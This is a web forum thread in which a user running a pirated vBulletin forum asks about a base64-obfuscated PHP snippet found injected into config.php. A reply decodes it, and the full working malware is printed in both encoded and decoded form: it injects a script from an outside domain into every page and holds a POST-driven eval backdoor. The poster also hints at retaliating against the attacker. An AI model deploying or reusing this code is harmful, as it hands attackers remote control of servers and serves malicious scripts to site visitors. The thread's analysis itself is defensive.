Hello, i have a forum, i installed on it vBulletin 3.8.4 nulled by DGT... it was working very great, but after couple of days the forum shut downed with this error in the home page Fatal error: Cannot redeclare kch() (previously declared in /home/gongring/public_html/index.php(1) : eval()'d code:1) in /home/gongring/public_html/includes/config.php(1) : eval()'d code on line 1 Code (markup): and error like it in the admin control panel too, beside when i checked the config.php file, i found it got edited with some how and this code has been added in it !! <?php eval(base64_decode('aWYoIWlzc2V0KCRrY2gxKSl7ZnVuY3Rpb24ga2NoKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMlJ5TFcxb1lYTm9hVzB1WTI5dEwwTnZiblJoWTNSVmN5OXRlV0ZzWW5WdExuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBrY2gyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGtjaDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGtjaDEpKWNhbGxfdXNlcl9mdW5jKCRrY2gxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2tjaCcpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdrY2gnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0ka2NobD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigna2NoMicpKSE9J2tjaDInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?> Code (markup): so i wonder is this new function that cause the error has been added by a hacker? or just this vBulletin version hasn't been nulled very well and the function has been generated by the forum files itself or maybe the files has been edited with some how by the vbulletin team to disable the forum ?? please any ideas about the reason of this error and the reason of editing the files ??? Thanks
Evaled code is the following: <?php if(!isset($kch1)){ function kch($s){ if(preg_match_all('#<script(.*?)</script>#is',$s,$a)) foreach($a[0] as $v) if(count(explode("\n",$v))>5){ $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v); if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write'))) $s=str_replace($v,'',$s);} if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a)) foreach($a[0] as $v) if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>')) $s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s); $s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2RyLW1oYXNoaW0uY29tL0NvbnRhY3RVcy9teWFsYnVtLnBocCA+PC9zY3JpcHQ+'),'',$s); if(stristr($s,'<body')) $s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a')) $s.=$a;return $s;}function kch2($a,$b,$c,$d){ global $kch1;$s=array(); if(function_exists($kch1))call_user_func($kch1,$a,$b,$c,$d); foreach(@ob_get_status(1) as $v) if(($a=$v['name'])=='kch')return; elseif($a=='ob_gzhandler')break; else $s[]=array($a=='default output handler'?false:$a); for($i=count($s)-1;$i>=0;$i--){ $s[$i][1]=ob_get_contents(); ob_end_clean();} ob_start('kch'); for($i=0;$i<count($s);$i++){ ob_start($s[$i][0]);echo $s[$i][1];} } } $kchl=(($a=@set_error_handler('kch2'))!='kch2')?$a:0; eval(base64_decode($_POST['e'])); ?> PHP: Last line seems to be some kind of backdoor. Other line seem to be playing with output and modifying it. base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2RyLW1oYXNoaW0uY29tL0NvbnRhY3RVcy9teWFsYnVtLnBocCA+PC9zY3JpcHQ+') PHP: is equivalent to <script src=http://dr-mhashim.com/ContactUs/myalbum.php ></script> Code (markup): So it's up to you to decide what to do. Don't open this script.
well, when i decoded the eval code i saw it function too, and that is why i posted this thread, because i couldn't understand why would someone put just a function into a forum files in case of there were no hack index or any thing like that, and i thought it was kind of disabling by the vbulletin team!! but now it seems like a damn hacker on my server and he is using shells to read and edit the files with this backdoor to gain traffic for his site, and that is why he didn't put a hack index. thanks bro for the reply, and now i will coding for him a little surprise that iam sure about he will not like at all
BEST ANSWER YET! Any other help is just supporting thieves... If you do not want to pay for your software, buy FREEware.